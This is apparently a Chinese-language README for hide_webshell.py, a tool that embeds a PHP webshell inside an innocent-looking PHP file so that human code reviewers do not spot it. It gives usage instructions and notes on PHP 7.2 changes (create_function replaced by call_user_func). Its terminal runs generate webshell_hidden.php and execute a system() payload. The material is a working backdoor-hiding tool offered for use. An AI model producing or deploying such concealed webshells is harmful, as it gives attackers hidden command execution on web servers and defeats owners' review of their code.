见公众号文章:传送门 ,或者见 fb 文章 https://www.freebuf.com/articles/web/241454.html
过人 webshell 的生成工具
» python hide_webshell.py
usage: hide_webshell.py [-h] -pf PAYLOAD_FILE [--pro] [-wf WEBSHELL_FILE]
[--debug]
php
hide_webshell.py: error: the following arguments are required: php, -pf/--payload_file将 payload 放在 -pf 所指定的路径
示例:
python hide_webshell.py normal.php -pf payload.txt
示例:
python hide_webshell.py normal_pro.php -pf payload.txt --pro
systemecho "hacked by Tr0y :)"
注:如果是 php <7.2 请见对应文件夹
核心变化是:
create_functionPHP 7.2 版本中被正式废弃的,并在后续版本(如 PHP 8.0)中被移除。现在替换成call_user_func。其实call_user_func较为麻烦,可以考虑直接用system- 由于变化 1,payload 长度,以及
normal_pro.php的变量要足够多,否则会导致无法正常提取参数 - 注意:在 PHP 中,
eval是一个语言结构(language construct)而不是函数,因此不能通过变量函数(variable functions)的方式来调用
# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:27]
» cat payload.txt
systemecho "hacked by Tr0y :)"%
# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:28]
» p hide_webshell.py normal.php -pf payload.txt && php webshell_hidden.php
[+] Hide webshell in normal mode
[-] Get payload from payload.txt
Payload is systemecho "hacked by Tr0y :)"
[-] Get php code from normal.php
[!] Saved webshell as webshell_hidden.php
[!] All done
Bye :)
hacked by Tr0y :)
# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:31]
» p hide_webshell.py normal_pro.php -pf payload.txt --pro && php webshell_hidden.php
[+] Hide webshell in pro mode
[-] Get payload from payload.txt
Payload is systemecho "hacked by Tr0y :)"
[-] Get php code from normal_pro.php
[!] Saved webshell as webshell_hidden.php
[!] All done
Bye :)
hacked by Tr0y :)
